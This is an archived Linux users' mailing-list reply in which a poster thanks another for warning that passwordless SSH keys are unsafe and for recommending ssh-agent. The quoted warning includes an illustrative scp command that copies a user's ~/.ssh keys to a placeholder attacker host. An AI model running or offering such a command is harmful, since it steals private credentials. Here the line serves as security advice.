Re: [tlug] Problems with scp anyone knows?

[Scott <scottro@example.com>]

On Fri, Jan 30, 2004 at 12:53:41PM +0900, Stephen J. Turnbull wrote:
> >>>>> "Scott" == Scott  <scottro@example.com> writes:
> 
>     Scott> It'll ask for a password you hit enter to leave password
>     Scott> blank.  It'll ask for confirmation.
> 
> Bad idea.  This is even worse than leaving a key in a little magnetic
> box stuck under your car's bumper, since it's trivial to do
> 
> scp ~/.ssh/* 'craven@example.com:~/stolen-keys/'
> 
> and the cracker can use your id without ever leaving the comfort of
> home.  Use a password, and then
> 
> $ eval `ssh-agent`
> $ ssh-add
> 
> 
>     Scott> I only use this on a few boxes where I'm going back and
>     Scott> forth on an internal network and have no idea if there are
>     Scott> major security implications with this method.
> 
> Now you know.  Unless physical security is _very_ good on that box
> (ie, start by installing a coffee maker and a urinal, so you never
> have to leave it), your network security is near zero, and that's a
> permanent loss once it happens.

Like everyone else, I'm glad you're back. 

I just learned something.  

Thanks, as always.


-- 

Scott Robbins

PGP keyID EB3467D6
( 1B48 077D 66F6 9DB0 FDC2 A409 FA54 D575 EB34 67D6 )
gpg --keyserver pgp.mit.edu --recv-keys EB3467D6



 Willow: It's horrible. That's me as a vampire? I'm so evil, and
skanky. And I think I'm kind of gay.
Buffy: Willow, just remember, a vampire's personality has nothing
to do with the person it was.
Angel: Well, actually... That's a good point.

Attachment: pgp00107.pgp
Description: PGP signature